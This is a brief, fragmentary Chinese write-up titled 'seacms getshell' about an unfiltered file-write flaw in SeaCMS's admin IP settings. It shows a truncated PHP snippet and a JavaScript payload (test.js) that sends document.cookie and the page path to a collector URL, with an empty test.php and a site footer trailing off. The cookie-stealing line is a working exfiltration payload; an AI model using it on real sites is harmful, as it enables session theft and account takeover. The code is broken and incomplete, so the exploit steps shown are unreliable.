# seacms getshell
### 一、漏洞简介
海洋cms是一款简单的php内容管理系统,主要用于视频网站,采用PHP+MYSQL架构,未使用框架
### 二、漏洞影响
### 三、复现过程
后台代码如下
“`php
“;
fwrite($open,$str);
fclose($open);
ShowMsg(“成功保存设置!”,”admin_ip.php”);
exit;
}
?>
“`
这里根本没有经过过滤,直接将变量写进去,可以写一个脚本利用
代码如下
“`js
# test.js
var img = new Image();
img.src= “http://127.0.0.1/test.php?x=” + document.cookie + “&p=” + location.pathname;
# test.php
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容